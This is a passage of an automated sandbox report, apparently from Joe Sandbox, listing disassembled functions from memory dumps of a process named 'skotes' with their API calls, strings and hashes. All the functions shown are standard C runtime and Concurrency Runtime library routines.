CallUnexpected.LIBVCRUNTIME ref: 020D58B7

Strings

csm, xrefs: 020D55B4
csm, xrefs: 020D5547
csm, xrefs: 020D5665

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: ad1611b132c96cd88c093627677e3344dfa0a654fa7a6ed2c70fbeb10c1165a9
Instruction ID: 8408393c7ce05cc27fed5f88c852e4ce97fa6100f4f0ea5bbfa5340c27c93dc8
Opcode Fuzzy Hash: ad1611b132c96cd88c093627677e3344dfa0a654fa7a6ed2c70fbeb10c1165a9
Instruction Fuzzy Hash: C3C14575802309EBCF26DFA4DC80AAEBFB6AF04315F94455AEC116B201D731DA51EFA1

Function 004352A5 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 004353A0
type_info::operator==.LIBVCRUNTIME ref: 004353C7
___TypeMatch.LIBVCRUNTIME ref: 004354D3
CatchIt.LIBVCRUNTIME ref: 00435528
IsInExceptionSpec.LIBVCRUNTIME ref: 004355AE
_UnwindNestedFrames.LIBCMT ref: 00435635
CallUnexpected.LIBVCRUNTIME ref: 00435650

Strings

csm, xrefs: 0043534D
csm, xrefs: 004353FE
csm, xrefs: 004352E0

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: ad1611b132c96cd88c093627677e3344dfa0a654fa7a6ed2c70fbeb10c1165a9
Instruction ID: 7946f23dea792be26d4820a62e4550dff79cbb7357508b3bf55c7f92dc133849
Opcode Fuzzy Hash: ad1611b132c96cd88c093627677e3344dfa0a654fa7a6ed2c70fbeb10c1165a9
Instruction Fuzzy Hash: C3C1AA71800609EFCF19DF95C881AAEBBB5BF1C315F04615BE8156B206C338EA51CF99

Function 00441ABC Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00441775: CreateFileW.KERNEL32(00000000,00000000,?,00441B65,?,?,00000000,?,00441B65,00000000,0000000C), ref: 00441792

GetLastError.KERNEL32 ref: 00441BD0
__dosmaperr.LIBCMT ref: 00441BD7
GetFileType.KERNEL32(00000000), ref: 00441BE3
GetLastError.KERNEL32 ref: 00441BED
__dosmaperr.LIBCMT ref: 00441BF6
CloseHandle.KERNEL32(00000000), ref: 00441C16
CloseHandle.KERNEL32(0043AC92), ref: 00441D63
GetLastError.KERNEL32 ref: 00441D95
__dosmaperr.LIBCMT ref: 00441D9C

Strings

H, xrefs: 00441D21

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 7e17bc01896d330f6a953f9dbc221eb630c8e931c060a5af7141eb9f4136a765
Instruction ID: 908140145710097c147751781d0df85f7731599b948b663735adbecd062618f5
Opcode Fuzzy Hash: 7e17bc01896d330f6a953f9dbc221eb630c8e931c060a5af7141eb9f4136a765
Instruction Fuzzy Hash: 20A13972A041489FDF19DF68DC91BAE3BB1EB0A324F14015EE811EB3E1D7389942CB59

Function 020D2BD7 Relevance: 16.7, APIs: 11, Instructions: 222COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 020D2BE9

Part of subcall function 020D2748: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 020D276B

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 020D2C0A
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 020D2C17
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 020D2C65
Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 020D2D0D
Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 020D2D3F

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
String ID:
API String ID: 1256429809-0
Opcode ID: df65faca3598a56f4a1189fa951469fdc42dcddc43790275eedfd99cb695ca9a
Instruction ID: f1c9e83260c14108367668e1d971d220f15b96a0c36787a0b05d5fb2ba953976
Opcode Fuzzy Hash: df65faca3598a56f4a1189fa951469fdc42dcddc43790275eedfd99cb695ca9a
Instruction Fuzzy Hash: 0E719870901309AFDF16DF64C980BFEBBB6AF49304F044099EC51AB292C732D916EB61

Function 00432970 Relevance: 16.7, APIs: 11, Instructions: 222COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00432982

Part of subcall function 004324E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00432504

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 004329A3
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 004329B0
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 004329FE
Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00432AA6
Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00432AD8

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
String ID:
API String ID: 1256429809-0
Opcode ID: df65faca3598a56f4a1189fa951469fdc42dcddc43790275eedfd99cb695ca9a
Instruction ID: 2c3f4ac1ddb9b2e884700b4006eb7aadb935b7841f65a9e333380771e6a1d96e
Opcode Fuzzy Hash: df65faca3598a56f4a1189fa951469fdc42dcddc43790275eedfd99cb695ca9a
Instruction Fuzzy Hash: 8271BC70A00249AFDF15DF54CA80BBFBBB1AF49308F04509AEC416B352C7B9AD16DB65

Function 020CEC90 Relevance: 16.6, APIs: 11, Instructions: 148windowCOMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 020CECE0

Part of subcall function 020C9196: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 020C91B7

Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 020CECF9
Concurrency::location::_Assign.LIBCMT ref: 020CED0F
Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 020CED7C
Concurrency::details::SchedulerBase::ClearQuickCacheSlot.LIBCMT ref: 020CED84
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 020CEDAB
Concurrency::details::VirtualProcessor::EnsureAllTasksVisible.LIBCONCRT ref: 020CEDB7
Concurrency::details::SchedulerBase::VirtualProcessorIdle.LIBCONCRT ref: 020CEDEF
Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 020CEE0E
Concurrency::details::SchedulerBase::VirtualProcessorIdle.LIBCONCRT ref: 020CEE1C
Concurrency::details::ReferenceCountedQuickBitSet::InterlockedClear.LIBCONCRT ref: 020CEE43

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$ContextVirtual$Processor::QuickScheduler$ClearCountedEventIdleInterlockedProcessorReferenceSet::$AssignAvailableBlockedCacheConcurrency::location::_DeactivateEnsureInternalMakeSlotSpinTasksThrowTraceUntilVisible
String ID:
API String ID: 3608406545-0
Opcode ID: a39cb41113445c8b37c8e93bd00c54bcce78915a73e61bcd78f9524f0075e564
Instruction ID: db805d34a3044e4b5f28f0f1a342e43c797e67e0a7aa67dcc175bf072ee90b04
Opcode Fuzzy Hash: a39cb41113445c8b37c8e93bd00c54bcce78915a73e61bcd78f9524f0075e564
Instruction Fuzzy Hash: 7E51A1B47003049FDB05EF64C495BAD77A6BF49310F2941ADED4A9B286CB70AC05DFA2

Function 020C6C41 Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 020C6C86
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 020C6CB8
List.LIBCONCRT ref: 020C6CF3
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 020C6D04
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 020C6D20
List.LIBCONCRT ref: 020C6D5B
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 020C6D6C
Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 020C6D87
List.LIBCONCRT ref: 020C6DC2
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 020C6DCF

Part of subcall function 020C6146: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 020C615E
Part of subcall function 020C6146: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 020C6170

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 3403738998-0
Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction ID: 19d5f43383f7be7f83bccaa0f474fa2409aaade9a567b8ac1cb4feb0cdd84fe3
Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction Fuzzy Hash: 53514AB1A00309ABDB18DF65C894BEDB7B9FF48344F6440ADD915AB281DB31BE44DB90

Function 004269DA Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00426A1F
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00426A51
List.LIBCONCRT ref: 00426A8C
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00426A9D
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00426AB9
List.LIBCONCRT ref: 00426AF4
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00426B05
Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426B20
List.LIBCONCRT ref: 00426B5B
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426B68

Part of subcall function 00425EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00425EF7
Part of subcall function 00425EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00425F09

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 3403738998-0
Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction ID: 579499c82c18d5a5ade90e723c63f8c40f3c28f02b2f1580fedc01109288aa91
Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction Fuzzy Hash: 9C516170B00229ABDB04DF65D495BEEB7A8FF08304F45406EE915EB381DB78AE45CB94

Function 020DA7C0 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 020DA7D6

Part of subcall function 020DB05C: HeapFree.KERNEL32(00000000,00000000,?,020DF334,?,00000000,?,?,?,020DF35B,?,00000007,?,?,020DF75D,?), ref: 020DB072
Part of subcall function 020DB05C: GetLastError.KERNEL32(?,?,020DF334,?,00000000,?,?,?,020DF35B,?,00000007,?,?,020DF75D,?,?), ref: 020DB084

_free.LIBCMT ref: 020DA7E2
_free.LIBCMT ref: 020DA7ED
_free.LIBCMT ref: 020DA7F8
_free.LIBCMT ref: 020DA803
_free.LIBCMT ref: 020DA80E
_free.LIBCMT ref: 020DA819
_free.LIBCMT ref: 020DA824
_free.LIBCMT ref: 020DA82F
_free.LIBCMT ref: 020DA83D

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1702a0a1dc840abddd1c64ba95121113f610cdca08529299edb68c6a0e13c010
Instruction ID: 7fbbccdd8975dcc111b9ef553c4132b5cffa93b2c0e2053eaedd34e480b1c6d6
Opcode Fuzzy Hash: 1702a0a1dc840abddd1c64ba95121113f610cdca08529299edb68c6a0e13c010
Instruction Fuzzy Hash: 23216676901208EFCB51EF94C880DDE7FF9BF08344F4145A6A6299B521EB32EA54DF84

Function 0043A559 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043A56F

Part of subcall function 0043ADF5: HeapFree.KERNEL32(00000000,00000000,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?), ref: 0043AE0B
Part of subcall function 0043ADF5: GetLastError.KERNEL32(?,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?,?), ref: 0043AE1D

_free.LIBCMT ref: 0043A57B
_free.LIBCMT ref: 0043A586
_free.LIBCMT ref: 0043A591
_free.LIBCMT ref: 0043A59C
_free.LIBCMT ref: 0043A5A7
_free.LIBCMT ref: 0043A5B2
_free.LIBCMT ref: 0043A5BD
_free.LIBCMT ref: 0043A5C8
_free.LIBCMT ref: 0043A5D6

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1702a0a1dc840abddd1c64ba95121113f610cdca08529299edb68c6a0e13c010
Instruction ID: d5756e4be776d265c631e914caca5967b4e144ec79bf9f4ded6797d03f0bc009
Opcode Fuzzy Hash: 1702a0a1dc840abddd1c64ba95121113f610cdca08529299edb68c6a0e13c010
Instruction Fuzzy Hash: C021E776940108FFCB01EFA9C881CDE7BBABF08345F0051AAF5459B521EB35EA94CB85

Function 00445A82 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlDecodePointer.NTDLL(?), ref: 00445A9B

Strings

exp, xrefs: 00445B1A, 00445B7F
acos, xrefs: 00445BD1
pow, xrefs: 00445B39, 00445BE3, 00445C30
log, xrefs: 00445AF8, 00445B07
asin, xrefs: 00445BC8
sqrt, xrefs: 00445BDA
log10, xrefs: 00445ADD, 00445AEC

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 7e11b681a690fd98a2b640cdef5f2481af1cc968e8b139b6733d987c9b93043a
Instruction ID: 8f21642526c0a384525b0a78e457c39df1912065d7a9ddf966662cad22d26739
Opcode Fuzzy Hash: 7e11b681a690fd98a2b640cdef5f2481af1cc968e8b139b6733d987c9b93043a
Instruction Fuzzy Hash: EE517E74904E4ADBEF109F58E88C5AE7F74FB05310F148157D880AA356CB789A2ACF1D

Function 00427364 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 80threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 004273B0
SwitchToThread.KERNEL32(?), ref: 004273D3
Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 004273F2
Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 0042740E
Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00427419
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00427440

Strings

count, xrefs: 0042737E
ppVirtualProcessorRoots, xrefs: 00427438

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementSwitchThreadstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 3791123369-3650809737
Opcode ID: c12b9fb7ade3771b82fb90936bc3b93d705f62869cacdabd48ca9c13149a27d9
Instruction ID: 910b0151320ec7fd7557316ad521234f334c06ab70371bbe18cdfb5d61862d5e
Opcode Fuzzy Hash: c12b9fb7ade3771b82fb90936bc3b93d705f62869cacdabd48ca9c13149a27d9
Instruction Fuzzy Hash: A8219334B00229EFCB10EF55D485AAEBBB5BF09344F54406AEC0197351CB38AE05CB98

Function 020E5939 Relevance: 13.8, APIs: 9, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f581972419559139547d94a09d48a4cf01951f6f19e23db2bc11059fe6a6d649
Instruction ID: 0f4fa9fb61bb81dd0dddf1b54f09d3d88f971435ac7381d7d9d7b0bd6a3185fd
Opcode Fuzzy Hash: f581972419559139547d94a09d48a4cf01951f6f19e23db2bc11059fe6a6d649
Instruction Fuzzy Hash: A6C1E0B0A043099FDF12CFA8DC90BADBFF1AF49308F454869E516AB291D7709981DF61

Function 004456D2 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f581972419559139547d94a09d48a4cf01951f6f19e23db2bc11059fe6a6d649
Instruction ID: ee9b374b754267b3a96934832a8bfcd590faa4b6eb17edeb4b1fb680e658e9fc
Opcode Fuzzy Hash: f581972419559139547d94a09d48a4cf01951f6f19e23db2bc11059fe6a6d649
Instruction Fuzzy Hash: A3C114B0A04649EFEF15DF99C880BAEBBB1AF49314F00416BE441A7393D7789901CF69

Function 020BC6B9 Relevance: 13.6, APIs: 9, Instructions: 138threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 020BC6E1
GetCurrentThreadId.KERNEL32 ref: 020BC6FE
GetCurrentThreadId.KERNEL32 ref: 020BC713
_xtime_get.LIBCPMT ref: 020BC75F
GetCurrentThreadId.KERNEL32 ref: 020BC791
__Xtime_diff_to_millis2.LIBCPMT ref: 020BC7A9
_xtime_get.LIBCPMT ref: 020BC7C8
GetCurrentThreadId.KERNEL32 ref: 020BC7D2
GetCurrentThreadId.KERNEL32 ref: 020BC829

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
String ID:
API String ID: 3943753294-0
Opcode ID: 614b4e817c589673b728cf08dcfac44524a47e1cde47449f47a12751e0a585f6
Instruction ID: 062b1f37c4ec69799fbc7dc9b87d12067cc84f7ccf9c34a2d083b02bc0856cc2
Opcode Fuzzy Hash: 614b4e817c589673b728cf08dcfac44524a47e1cde47449f47a12751e0a585f6
Instruction Fuzzy Hash: B1517C34900305DFEF62DF24C9849EDB7F1EF08715B2440AAE8069BA51CB30E881DFA5

Function 020C7B48 Relevance: 13.6, APIs: 9, Instructions: 106timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 020C7B6A

Part of subcall function 020C5F1F: __EH_prolog3_catch.LIBCMT ref: 020C5F26
Part of subcall function 020C5F1F: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 020C5F5F

Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 020C7B78

Part of subcall function 020C6B84: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 020C6BA9
Part of subcall function 020C6B84: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 020C6BCC

Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 020C7B91
Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 020C7B9D

Part of subcall function 020C5F1F: RtlInterlockedPopEntrySList.NTDLL(?), ref: 020C5FA8
Part of subcall function 020C5F1F: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 020C5FD7
Part of subcall function 020C5F1F: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 020C5FE5

Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 020C7BE9
Concurrency::location::_Assign.LIBCMT ref: 020C7C0A
Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 020C7C12
Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 020C7C24
Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 020C7C54

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
String ID:
API String ID: 2678502038-0
Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction ID: afbabe080f0e07b3ed0258ef2a44a69ad1a1d29e685a198aec755337d300cc5d
Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction Fuzzy Hash: 433103B0A003469BDF96AB7888817FEFBFE5F41304F2400ADC855E7251DB265849EFA1

Function 004278E1 Relevance: 13.6, APIs: 9, Instructions: 106timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00427903

Part of subcall function 00425CB8: __EH_prolog3_catch.LIBCMT ref: 00425CBF
Part of subcall function 00425CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00425CF8

Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 00427911

Part of subcall function 0042691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00426942
Part of subcall function 0042691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00426965

Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 0042792A
Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00427936

Part of subcall function 00425CB8: RtlInterlockedPopEntrySList.NTDLL(?), ref: 00425D41
Part of subcall function 00425CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00425D70
Part of subcall function 00425CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00425D7E

Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00427982
Concurrency::location::_Assign.LIBCMT ref: 004279A3
Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 004279AB
Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 004279BD
Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 004279ED

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
String ID:
API String ID: 2678502038-0
Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction ID: be26d28973ab40e19276e1e39a9ed43843e9869f42fe47dc141d3d43563d5587
Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction Fuzzy Hash: 9F314670B083715AEF16AA7854927FF77B59F01304F4401ABD485D7342DA2C4D8AC3D9

Function 020D0BEC Relevance: 13.6, APIs: 9, Instructions: 69threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 020D0C02
